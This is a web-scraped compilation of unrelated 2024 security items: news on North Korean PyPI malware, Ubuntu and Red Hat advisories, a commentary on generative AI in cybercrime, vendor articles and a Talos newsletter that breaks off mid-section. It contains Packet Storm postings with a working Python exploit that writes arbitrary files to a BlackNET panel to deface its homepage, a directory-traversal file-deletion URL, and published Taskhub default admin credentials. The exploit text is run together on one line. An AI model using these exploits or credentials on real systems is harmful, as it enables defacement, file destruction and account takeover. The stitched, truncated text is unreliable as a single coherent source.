A North Korean advanced persistent threat (APT) actor (aka Gleaming Pisces) tried to sneak simple backdoors into public software packages.

Source: Chronicle via Alamy Stock Photo

One of North Korea's most sophisticated threat groups has been hiding remote access malware for macOS and Linux inside of open source Python packages.

North Korean advanced persistent threats (APTs) have become notorious for certain characteristic types of cyberattack in recent years. There's the cryptocurrency scam, which can come in many forms — often a fake trading platform, where victims are lured into divulging their wallet information or downloading malware. Supply chain attacks are common, particularly via poisoned packages typosquatting on public repositories. An impish recent trend involves contracting actual, honest labor to Western companies under false pretenses, then sending the salaries earned back to Kim's state. The reverse — agents posing as tech recruiters, convincing developers to download malware — is also common.

The group, which Palo Alto's Unit 42 tracks as Gleaming Pisces (and Microsoft as Citrine Sleet), seems to have supplemented category one with category two. Active since 2018, the financially motivated, DPRK Reconnaissance General Bureau (RGB)-linked group is known for attacks weaponizing fake crypto platforms. Unit 42 now assesses with medium confidence that it was responsible for uploading a handful of malicious packages to the Python Package Index (PyPI) back in February. The packages have since been taken down.

**DPRK-Poisoned PyPI Packages**

Most packages uploaded to open source repositories are simple by nature. As Louis Lang, co-founder and chief technology officer (CTO) at Phylum recalls, "What was interesting about these packages was that there was a higher order of complexity than you typically find among benign packages."

Phylum had identified four packages worth taking a second look at: real-ids, minisound, coloredtxt, and beautifultext. The innocuous names seemed to allude to legitimate functionality, like syntax highlighting for terminal outputs.

In reality, the packages contained malicious code that would be decoded and executed upon download. The code would then run bash commands in order to retrieve and download a remote access Trojan (RAT) called "PondRAT."

PondRAT is an entirely simple backdoor, capable of just a few functions: uploading and downloading files, checking to see that an implant is active or instructing it to sleep, and executing commands issued by the operator. It is, in essence, a "light" version of PoolRAT. PoolRAT is a known Gleaming Pisces backdoor for macOS that has a half dozen more standard capabilities than its successor, like listing directories, deleting files, etc.

**No Need for Windows**

More notable than the malware itself may be the fact that its authors wrote it only for macOS and Linux systems.

Forgoing hackers' long preferred Windows operating system makes sense, though, when one considers Gleaming Pisces' typical audience. As Lang explains, "They're targeting the actual builders, CI/CD infrastructure, developer workstations — environments that are overwhelmingly going to be Linux or macOS based. Very few people are doing development on straight Windows. So if you are targeting developers, it makes sense to ship variants for these systems, because that's where your target population lives."

Developers, then, need to be alert to phishing attacks, like those fake crypto platforms and job recruitment scams. Because while it's rare that anyone might pull an unpopular, ultra-generic package from PyPI, it's entirely likely that that same package could be quietly integrated into a broader infection chain.

"If you add a package, it could have downstream impacts, where you're actually pulling in 30, 40 other packages it may \[be connected to\]. So if I was a developer, I'd be very cognizant of what I'm installing, and try to minimize the attack surface by minimizing the number packages I'm pulling in. And then, obviously, scan the packages — look for these zombies, look for high-entropy strings, look for code obfuscation," Lang suggests.

"Like we always say," he adds, "you're one update away from malware."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Citrine Sleet Poisons PyPI Packages With Mac &amp; Linux Malware

Ubuntu Security Notice 7027-1 - It was discovered that Emacs incorrectly handled input sanitization. An attacker could possibly use this issue to execute arbitrary commands. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. Xi Lu discovered that Emacs incorrectly handled input sanitization. An attacker could possibly use this issue to execute arbitrary commands. This issue only affected Ubuntu 16.04 LTS, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-7027-1  
September 19, 2024

emacs, emacs24, emacs25 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in Emacs.

Software Description:  
- emacs: GNU Emacs editor (metapackage)  
- emacs25: GNU Emacs editor (with GTK+ GUI support)  
- emacs24: GNU Emacs editor

Details:

It was discovered that Emacs incorrectly handled input sanitization. An  
attacker could possibly use this issue to execute arbitrary commands. This  
issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04  
LTS. (CVE-2022-45939)

Xi Lu discovered that Emacs incorrectly handled input sanitization. An  
attacker could possibly use this issue to execute arbitrary commands. This  
issue only affected Ubuntu 16.04 LTS, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS  
and Ubuntu 22.04 LTS. (CVE-2022-48337)

Xi Lu discovered that Emacs incorrectly handled input sanitization. An  
attacker could possibly use this issue to execute arbitrary commands. This  
issue only affected Ubuntu 22.04 LTS. (CVE-2022-48338)

Xi Lu discovered that Emacs incorrectly handled input sanitization. An  
attacker could possibly use this issue to execute arbitrary commands. This  
issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04  
LTS. (CVE-2022-48339)

It was discovered that Emacs incorrectly handled filename sanitization. An  
attacker could possibly use this issue to execute arbitrary commands. This  
issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04  
LTS. (CVE-2023-28617)

It was discovered that Emacs incorrectly handled certain crafted files. An  
attacker could possibly use this issue to crash the program, resulting in  
a denial of service. This issue only affected Ubuntu 16.04 LTS, Ubuntu  
18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2024-30203,  
CVE-2024-30204, CVE-2024-30205)

It was discovered that Emacs incorrectly handled certain crafted files. An  
attacker could possibly use this issue to execute arbitrary commands.  
(CVE-2024-39331)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   emacs                           1:29.3+1-1ubuntu2+esm1  
                                   Available with Ubuntu Pro  
   emacs-bin-common                1:29.3+1-1ubuntu2+esm1  
                                   Available with Ubuntu Pro  
   emacs-common                    1:29.3+1-1ubuntu2+esm1  
                                   Available with Ubuntu Pro  
   emacs-el                        1:29.3+1-1ubuntu2+esm1  
                                   Available with Ubuntu Pro

Ubuntu 22.04 LTS  
   emacs                           1:27.1+1-3ubuntu5.2  
   emacs-bin-common                1:27.1+1-3ubuntu5.2  
   emacs-common                    1:27.1+1-3ubuntu5.2  
   emacs-el                        1:27.1+1-3ubuntu5.2

Ubuntu 20.04 LTS  
   emacs                           1:26.3+1-1ubuntu2+esm1  
                                   Available with Ubuntu Pro  
   emacs-bin-common                1:26.3+1-1ubuntu2+esm1  
                                   Available with Ubuntu Pro  
   emacs-common                    1:26.3+1-1ubuntu2+esm1  
                                   Available with Ubuntu Pro  
   emacs-el                        1:26.3+1-1ubuntu2+esm1  
                                   Available with Ubuntu Pro

Ubuntu 18.04 LTS  
   emacs25                         25.2+1-6ubuntu0.1~esm2  
                                   Available with Ubuntu Pro  
   emacs25-bin-common              25.2+1-6ubuntu0.1~esm2  
                                   Available with Ubuntu Pro  
   emacs25-common                  25.2+1-6ubuntu0.1~esm2  
                                   Available with Ubuntu Pro  
   emacs25-el                      25.2+1-6ubuntu0.1~esm2  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   emacs24                         24.5+1-6ubuntu1.1+esm4  
                                   Available with Ubuntu Pro  
   emacs24-bin-common              24.5+1-6ubuntu1.1+esm4  
                                   Available with Ubuntu Pro  
   emacs24-common                  24.5+1-6ubuntu1.1+esm4  
                                   Available with Ubuntu Pro  
   emacs24-el                      24.5+1-6ubuntu1.1+esm4  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-7027-1  
   CVE-2022-45939, CVE-2022-48337, CVE-2022-48338, CVE-2022-48339,  
   CVE-2023-28617, CVE-2024-30203, CVE-2024-30204, CVE-2024-30205,  
   CVE-2024-39331,https://launchpad.net/bugs/2070418

Package Information:  
   https://launchpad.net/ubuntu/+source/emacs/1:27.1+1-3ubuntu5.2

Ubuntu Security Notice USN-7027-1

BlackNET version 3.7.0.0 appears to allow unauthenticated access to modify data and suffers from arbitrary file deletion and directory traversal vulnerabilities while authenticated.

    # Exploit Title: BlackNET - Multiple Vulnerabilities# Exploit Author: bRpsd# Date: 20/09/2024# Vendor Homepage: https://github.com/AndroVirus# Software Link: https://github.com/AndroVirus/BlackNET/# Version: v3.7.0.0# Tested on: MacOS - Xampp# CVE: NAimport requests# Define the target URL for the POST requestpost_url = "http://localhost/x/BlackNET/BlackNET%20Panel/post.php"# Defaces the homepagepayload = "Nothing to see here."data = {    'folder_name': 'www',  # this can create any folder on the server    'file_name': 'index.html',  # Name of the file to be created    'data': payload  # The payload being tested}# Send the POST requestresponse = requests.post(post_url, data=data)# Check the responseif response.status_code == 200:    print("Request successful. Check if 'file' was created.")else:    print(f"Request failed with status code: {response.status_code}")    # Vulnerable code: /BlackNET/BlackNET%20Panel/post.php# header('Content-type: text/html; charset=utf-8');## require_once 'config/config.php';# require_once APP_PATH . 'classes/POST.php';## if ($_SERVER['REQUEST_METHOD'] == "POST") {#  $POST = new BlackNET\POST();# $folder_name = isset($_POST['folder_name']) && $_POST['folder_name'] != "" ? $_POST['folder_name'] : 'www';#    $file_name = isset($_POST['file_name']) ? $_POST['file_name'] : "unknown.txt";##   $data = $POST->sanitize($_POST['data']);##  $POST->prepare($folder_name, $file_name, $data);## $POST->write();   ############################################################################################# Arbitrary File Deletion & Directory Traversal [Authenticated]# File: rmfile.php# Parameter: fname# Vul Code:#<?php# require_once 'session.php';#$msg = "";#$id = "";#if ($_SERVER['REQUEST_METHOD'] == "POST") {#    $files = $_POST['file'];#    $vicid = $utils->sanitize($_POST['vicid']);#    if ($auth->checkToken($_POST['csrf'], $_SESSION['csrf'])) {#        foreach ($files as $file) {#if (strpos($file, "../")) {#                $id = $vicid;#                $msg = "error";#            }#            $filename = $utils->sanitize($file);#            $real_path = realpath("upload" . "/" . $vicid . "/" . $filename);#            if (file_exists($real_path)) {#                unlink($real_path);### Proof Of Concept:# http://localhost/x/BlackNET/BlackNET%20Panel/rmfile.php?fname=../favico.png&vicid=&csrf=95a6ae14d491e482b4370da1fd74f69891058f12472e6510e373889d99d84c3c

BlackNET 3.7.0.0 Missing Authentication / File Deletion / Traversal

Taskhub version 3.0.3 suffers from an ignored default credential vulnerability.

**Taskhub 3.0.3 Insecure Settings**

Posted Sep 20, 2024

Authored by indoushka

Taskhub version 3.0.3 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 7505071b9896db1b7f4f5cd911d9d07b06247bd94dbf46777a4481d4b83f1ddd

Download | Favorite | View

**Taskhub 3.0.3 Insecure Settings**

    =============================================================================================================================================| # Title     : Taskhub v3.0.3 Insecure Settings Vulnerability                                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 12345678[+] https://www/127.0.0.1/tasks.octalfoxcom/auth/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,862)
*   Arbitrary (17,077)
*   BBS (2,859)
*   Bypass (1,923)
*   CGI (1,047)
*   Code Execution (7,902)
*   Conference (692)
*   Cracker (845)
*   CSRF (3,427)
*   DoS (25,263)
*   Encryption (2,395)
*   Exploit (54,266)
*   File Inclusion (4,274)
*   File Upload (1,017)
*   Firewall (822)
*   Info Disclosure (2,916)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,281)
*   Local (14,850)
*   Magazine (587)
*   Overflow (13,223)
*   Perl (1,435)
*   PHP (5,271)
*   Proof of Concept (2,411)
*   Protocol (3,749)
*   Python (1,660)
*   Remote (31,888)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (642)
*   Scanner (1,658)
*   Security Tool (8,048)
*   Shell (3,305)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,725)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,092)
*   Web (10,138)
*   Whitepaper (3,784)
*   x86 (970)
*   XSS (18,301)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,114)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,124)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (389)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,237)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,845)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,852)
*   UNIX (9,456)
*   UnixWare (188)
*   Windows (6,772)
*   Other

Taskhub 3.0.3 Insecure Settings

Red Hat Security Advisory 2024-6849-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6849.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: edk2 security updateAdvisory ID:        RHSA-2024:6849-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6849Issue date:         2024-09-19Revision:           03CVE Names:          CVE-2023-45235====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* edk2: Buffer overflow when handling Server ID option from a DHCPv6 proxy Advertise message (CVE-2023-45235)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45235References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2258700

Red Hat Security Advisory 2024-6849-03

The lack of abundant data on AI-enabled attacks in official reports shouldn't prevent us from preparing for and mitigating potential future threats.

Source: marcos alvarado via Alamy Stock Photo

COMMENTARY

The Verizon "Data Breach Investigations Report" (DBIR) is a highly credible annual report that provides valuable insights into data breaches and cyber threats, based on analysis of real-world incidents. Professionals in cybersecurity rely on this report to help inform security strategies based on trends in the evolving threat landscape. However, the 2024 DBIR has raised some interesting questions, particularly regarding the role of generative AI in cyberattacks.

**The DBIR Stance on Generative AI**

The authors of the latest DBIR state that researchers "kept an eye out for any indications of the use of the emerging field of generative artificial intelligence (GenAI) in attacks and the potential effects of those technologies, but nothing materialized in the incident data we collected globally."

While I have no doubt this statement is accurate based on Verizon's specific data collection methods, it is in stark contrast to what we are seeing in the field. The main caveat to Verizon's blanket statement on GenAI is in the 2024 DBIR appendix, where there is a mention of a Secret Service investigation that demonstrated GenAI as a "critically enabling technology" for attackers who didn't speak English.

However, at SlashNext, we've observed that the real impact of GenAI on cyberattacks extends well beyond this one use case. Below are six different use cases that we have seen "in the wild."

**Six Use Cases of Generative AI in Cybercrime****1\. AI-Enhanced Phishing Emails**

Threat researchers have observed cybercriminals sharing guides on how to use GenAI and translation tools to improve the efficacy of phishing emails. In these forums, hackers suggest using ChatGPT to generate professional-sounding emails and provide tips for non-native speakers to create more convincing messages. Phishing is already one of the most prolific attack types and, even according to Verizon's DBIR, it takes only, on average, 21 seconds for a user to click on a malicious link in a phishing email once the email is opened, and only another 28 seconds for the user to give away their data. Attackers leveraging GenAI to craft phishing emails only makes these attacks more convincing and effective.

**2\. AI-Assisted Malware Generation**

Attackers are exploring the use of AI to develop malware, such as keyloggers that can operate undetected in the background. They are asking WormGPT, an AI-based large language model (LLM), to help them create a keylogger using Python as a coding language. This demonstrates how cybercriminals are leveraging AI tools to streamline and enhance their malicious activities. By using AI to assist in coding, attackers can potentially create more sophisticated and harder-to-detect malware.

**3\. AI-Generated Scam Websites**

Cybercriminals are using neural networks to create a series of scam webpages, or "turnkey doorways," designed to redirect unsuspecting victims to fraudulent websites. These AI-generated pages often mimic legitimate sites but contain hidden malicious elements. By leveraging neural networks, attackers can rapidly produce large numbers of convincing fake pages, each slightly different to evade detection. This automated approach allows cybercriminals to cast a wider net, potentially ensnaring more victims in their phishing schemes.

**4\. Deepfakes for Account Verification Bypass**

SlashNext threat researchers have observed vendors on the Dark Web offering services that create deepfakes to bypass account verification processes for banks and cryptocurrency exchanges. These are used to circumvent "know your customer" (KYC) guidelines. This alarming trend shows how AI-generated deepfakes are evolving beyond social engineering and misinformation campaigns into tools for financial fraud. Criminals are using advanced AI to create realistic video and audio impersonations, fooling security systems that rely on biometric verification. 

**5\. AI-Powered Voice Spoofing**

Cybercriminals are sharing information on how to use AI to spoof and clone voices for use in various cybercrimes. This emerging threat leverages advanced machine-learning algorithms to recreate human voices with startling accuracy. Attackers can potentially use these AI-generated voice clones to impersonate executives, family members, or authority figures in social engineering attacks. For instance, they might make fraudulent phone calls to authorize fund transfers, bypass voice-based security systems, or manipulate victims into revealing sensitive information. 

**6\. AI-Enhanced One-Time Password Bots**

AI is being integrated into one-time password (OTP) bots to create templates for voice phishing. These sophisticated tools include features like custom voices, spoofed caller IDs, and interactive voice response systems. The custom voice feature allows criminals to mimic trusted entities or even specific individuals, while spoofed caller IDs lend further credibility to the scam. The interactive voice response systems add an extra layer of realism, making the fake calls nearly indistinguishable from legitimate ones. This AI-powered approach not only increases the success rate of phishing attempts but also makes it more challenging for security systems and individuals to detect and prevent such attacks.

While I agree with the DBIR that there is a lot of hype surrounding AI in cybersecurity, it's crucial not to dismiss the potential impact of generative AI on the threat landscape. The anecdotal evidence presented above demonstrates that cybercriminals are actively exploring and implementing AI-powered attack methods.

**Looking Ahead**

Organizations must take a proactive stance on AI in cybersecurity. Even if the volume of AI-enabled attacks is currently low in official datasets, our anecdotal evidence suggests that the threat is real and growing. Moving forward, it's essential to do the following:

*   Stay informed about the latest developments in AI and cybersecurity
    
*   Invest in AI-powered security solutions that can demonstrate clear benefits
    
*   Continuously evaluate and improve security processes to address evolving threats
    
*   Be vigilant about emerging attack vectors that leverage AI technologies
    

While we respect the findings of the DBIR, we believe that the lack of abundant data on AI-enabled attacks in official reports shouldn't prevent us from preparing for and mitigating potential future threats — particularly since GenAI technologies have become widely available only within the past two years. The anecdotal evidence we've presented underscores the need for continued vigilance and proactive measures.

**About the Author**

Field CTO, SlashNext

J. Stephen Kowski is an experienced global technical leader with a demonstrated history in the cybersecurity, design, engineering, information technology, and manufacturing industries. In his current role as field chief technology officer (CTO) of SlashNext, he provides sales enablement for internal and external partners, and he represents the “Voice of the Customer” to senior leadership and product and engineering teams. Stephen has a background in information technology, Web development, engineering, robotics, sales, and software development. He is a graduate of the Stetson University College of Law, the University of South Carolina College of Engineering and Computing, and the University of South Florida College of Engineering. When he isn’t helping companies fight threat actors, he helps run two high school K-12 education charities focused on getting kids excited about STEM career pathways through the vehicle of competitive robotics in his community, and was one of the charities' original founders 20 years ago.

GenAI in Cybersecurity: Insights Beyond the Verizon DBIR

In IT environments, some secrets are managed well and some fly under the radar. Here’s a quick checklist of what kinds of secrets companies typically manage, including one type they should manage:

Passwords [x]
TLS certificates [x]
Accounts [x]
SSH keys ???

The secrets listed above are typically secured with privileged access management (PAM) solutions or similar. Yet, most traditional PAM

In IT environments, some secrets are managed well and some fly under the radar. Here's a quick checklist of what kinds of secrets companies typically manage, including one type they should manage:

*   Passwords \[x\]
*   TLS certificates \[x\]
*   Accounts \[x\]
*   SSH keys ???

The secrets listed above are typically secured with privileged access management (PAM) solutions or similar. Yet, most traditional PAM vendors hardly talk about SSH key management. The reason is simple: they don't have the technology to do it properly.

We can prove it. All our SSH key management customers have had a traditional PAM deployed, but they realized that they couldn't manage SSH keys with it. At best, traditional PAMs can discover, let alone manage, 20% of all keys.

****So, what's the fuss about SSH keys?****

SSH keys are access credentials in the Secure Shell (SSH) protocol. In many ways, they're just like passwords but functionally different. On top of that, keys tend to outnumber passwords, especially in long-standing IT environments, by the ratio of 10:1. While only some passwords are privileged, **_almost all SSH keys_** open doors to something valuable.

One key can also open doors to multiple servers, just like a skeleton key in old manors. A root key allows admin access to a single server or multiple ones. After conducting a risk assessment with us, one of our customers discovered a root key that allowed access to ALL their servers.

Another risk is that anyone can self-provision SSH keys. They aren't centrally managed, and it's by design. This is why key proliferation is a lingering problem in large-scale IT environments.

There's even more: Keys don't come with an identity by default, so sharing or duplicating them is very easy. Also, with third parties. By default, keys never expire.

On top of it all, there are interactive and automated connections, the latter of which are more prevalent. Millions of automated application-to-application, server-to-server, and machine-to-machine connections are being run using SSH every day, but not enough organizations (most of them our customers) have control over machine SSH credentials.

I'm sure you got the point: your IT environment might be littered with keys to your kingdom, but you don't know how many there are, who's using them, which ones are legit and which ones should be deleted, keys don't have a best-before date, and more can be created at will without proper oversight.

The key problem is your key problem.

****Why can't traditional PAMs handle SSH keys**?**

Because SSH keys are functionally different from passwords, traditional PAMs don't manage them very well. Legacy PAMs were built to vault passwords, and they try to do the same with keys. Without going into too much detail about key functionality (like public and private keys), vaulting private keys and handing them out at request simply doesn't work. Keys must be secured at the server side, otherwise keeping them under control is a futile effort.

Furthermore, your solution needs to discover keys first to manage them. Most PAMs can't. There are also key configuration files and other key(!) elements involved that traditional PAMs miss. Read more in the following document:

****Your PAM isn't complete without SSH key management****

Even if your organization manages 100% of your passwords, the chances are that you're still missing 80% of your critical credentials if you aren't managing SSH keys. As the inventors of the Secure Shell (SSH) protocol, we at SSH Communications Security are the original source of the access credential called the SSH key. We know the ins and outs of their management.

****Your PAM is not future-proof without credential-less access****

Let's come back to the topic of passwords. Even if you have them vaulted, you aren't managing them in the best possible way. Modern, dynamic environments - using in-house or hosted cloud servers, containers, or Kubernetes orchestration - don't work well with vaults or with PAMs that were built 20 years ago.

This is why we offer modern ephemeral access where the secrets needed to access a target are granted just-in-time for the session, and they automatically expire once the authentication is done. This leaves no passwords or keys to manage - at all. Our solution is also non-intrusive: implementing it requires minimal changes to your production environment.

How's that for reducing the attack surface, eliminating complexity, saving on costs, and minimizing risk? Read more here:

So, the best way to manage passwords AND keys is **_not to have to manage them at all_** and move to ephemeral secrets management instead. Like this:

****"I wish I was still rotating passwords and keys." Said no customer ever!****

Once you go credential-less, you don't go back. Take it from our customers who have rated our solution with an NPS score of 71 – which is astronomical in the cybersecurity field.

Traditional PAMs have worked well so far, but it's time to future-proof your environment with a modern solution that allows you to go passwordless and keyless. At a pace comfortable to you.

Check out our PrivX Zero Trust Suite to learn how to do access and secrets management in a comprehensive manner.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Passwordless AND Keyless: The Future of (Privileged) Access Management

Google on Thursday unveiled a Password Manager PIN to let Chrome web users sync their passkeys across Windows, macOS, Linux, ChromeOS, and Android devices.
"This PIN adds an additional layer of security to ensure your passkeys are end-to-end encrypted and can't be accessed by anyone, not even Google," Chrome product manager Chirag Desai said.
The PIN is a six-digit code by default, although it's

Encryption / Digital Security

Google on Thursday unveiled a Password Manager PIN to let Chrome web users sync their passkeys across Windows, macOS, Linux, ChromeOS, and Android devices.

"This PIN adds an additional layer of security to ensure your passkeys are end-to-end encrypted and can't be accessed by anyone, not even Google," Chrome product manager Chirag Desai said.

The PIN is a six-digit code by default, although it's also possible to create a longer alpha-numeric PIN by selecting "PIN options."

This marks a change from the previous status quo where users could only save passkeys to save passkeys to Google Password Manager on Android.

While the passkeys could be used on other platforms, it was necessary to scan a QR code using the device where they were generated.

The latest change removes that step, making it a lot easier for users to sign in to online services using passkeys by simply scanning their biometrics. Google noted that support for iOS is expected to arrive soon.

This, however, requires the users to know either the Password Manager PIN or the screen lock for their Android devices before using passkeys on a new device.

"These recovery factors will allow you to securely access your saved passkeys and sync new ones across your computers and Android devices," Desai said.

The development comes as the tech giant said passkeys are being used by more than 400 million Google accounts as of May 2024. Two months later, the phishing-resistant alternative was made available to high-risk users via its Advanced Protection Program (APP).

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chrome Users Can Now Sync Passkeys Across Devices with New Google PIN Feature

PRESS RELEASE

SAN FRANCISCO, Sept. 18, 2024 /PRNewswire/ -- Abstract Security, building the future of AI-enabled security operations, today announced it has added support for deployments within Google Cloud Platform (GCP).

The support for GCP follows Abstract Security's existing support for AWS and Azure. Abstract enables multi-cloud deployments of its SOC platform, deploying multiple instances of Abstract Security around the world to support data localization requirements and eliminate data transfer costs. Additionally, Abstract supports transactions through both AWS and Azure marketplaces with GCP coming soon.

"Abstract's ability to offer customers a true multi-cloud offering with three different cloud platforms in AWS, Azure and now GCP is something we're very proud of for this growing startup," said Colby DeRodeff, co-founder and CEO of Abstract Security. "Because we deploy directly into our customers' cloud environment, we enable those customers to truly own their own data, which separates us from most of our competitors."

Abstract Security's SOC platform offers:

*   Seamless integration with local GCP services - Ensuring strong security coverage and visibility into GCP services.
    
*   Abstract Intel Gallery - As part of Abstract's data fabric, organizations can leverage no-code ETL to enrich events with real-time threat intelligence, enhancing detection accuracy and relevancy.
    
*   Real-time streaming threat detection - Security analytics are powered by AI, enabling enterprises to stay ahead of rapidly evolving cyber threats.
    
*   Compliance and data sovereignty - Providing a single search and reporting view across regional deployments, enabling compliance with data localization requirements.
    

Abstract has seen growing demand since emerging from stealth and announcing its Seed funding in March 2024. In April, Abstract announced the opening of its first Middle East office. In May, the company announced the addition of Christopher Key to its Board of Directors and was selected as a "Pioneering Cybersecurity Startup" winner, as part of the 2024 Global Infosec Awards.

About Abstract Security

Abstract Security, founded in 2023, has built a revolutionary platform equipped with an AI-powered assistant to better centralize the management of security analytics. Crafted by category creators and industry veterans known for redefining the cybersecurity landscape, Abstract transcends next-gen SIEM solutions by correlating data in real time between data streams. As a result, compliance and security data can be leveraged separately to increase detection effectiveness and lower costs – an approach that does not currently exist in the market.

The leadership team of Colby DeRodeff, Ryan Clough, Aaron Shelmire, Chris Camacho, and Stefan Zier bring a unique set of experiences and backgrounds in product development and company-building expertise, at companies such as ArcSight (acq. by HP), Mandiant (acq. by Google), Palo Alto Networks and Sumo Logic. For more information about the company, please visit https://www.abstract.security/ and follow the journey @Get\_Abstracted.

You May Also Like

Abstract Security Expands Multi-Cloud Security Operations

This year, Congress only allocated $55 million in federal grant dollars to states for security and other election improvements.

Thursday, September 19, 2024 14:00

Last week, six Secretaries of State testified to U.S. Congress about the current state of election security ahead of November’s Presidential election. 

Some of the same topics came up as usual — disinformation campaigns, influence from foreign actors, and the physical protection of poll workers on election day. 

It’s good that these conversations are continuing after the various revelations that came out after the 2016 presidential election, and election security is an issue globally, especially this year when there are major elections taking place in hundreds of countries.  

As with many things in politics and life, though, there is still an issue of money. 

Talk of the importance of election security is positive, but at the end of the day, states and municipalities will need monetary and human resources to implement the appropriate defenses and protect everything from voting machines to online vote-tallying systems and social media disinformation campaigns.  

Arizona Secretary of State Adrian Fontes used his time in front of Congress to ask for additional funding, because his state has been unable to execute all their election security goals.  

“None of this is free and none of it is cheap,” he said. “Our operations, administration and security depend on intermittent, rare and never enough funding for the Help America Vote Act grants that we are occasionally given by Congress.” 

Additional federal funds became available for U.S. elections in 2017 after the Department of Homeland Security deemed election systems to be critical infrastructure. But this year, Congress only allocated $55 million in federal grant dollars to states for security and other improvements to elections. For comparison’s sake, presidential and Congressional candidates in the U.S. spent $14 billion on their election campaigns, more than double the amount from 2016. 

At the time, Republican lawmakers in the House voted to totally zero out the fund for the Help America Vote Act, or HAVA, grants, which have existed since 2002. 

One lobbyist even told the Stateline outlet earlier this year that many states were trying to stretch the money they do get from the HAVA program across multiple years for fear of a lack of funding in the coming election cycles.  

JP Martin, deputy communications director for the Arizona secretary of state, said in that same article that Arizona (a crucial swing state in most presidential elections) has had to put a hiring freeze in place because a lack of federal funding. 

So, talk, awareness and planning to secure elections are all positive things. But at the end of the day, all these technologies and solutions, and the people that provide them, cost money. 

**The one big thing **

Cisco Talos’ Vulnerability Research team discovered two vulnerabilities have been disclosed and fixed over the past few weeks. Talos discovered a time-of-check time-of-use vulnerability in Adobe Acrobat Reader, one of the most popular PDF readers currently available, and an information disclosure vulnerability in the Microsoft Windows AllJoyn API. 

**Why do I care? **

AllJoyn is a DCOM-like framework for creating method calls or sending one-way signals between applications on a distributed bus. It primarily is used in internet-of-things (IoT) devices to tell the devices to perform certain tasks, like turning lights on or off or reading the temperature of a space. TALOS-2024-1980 (CVE-2024-38257) could allow an adversary to view uninitialized memory on the targeted machine. Adobe Acrobat Reader, one of the most popular pieces of PDF reading software currently available, contains a time-of-check, use-after-free vulnerability that could trigger memory corruption, and eventually, arbitrary code execution. 

**So now what? **

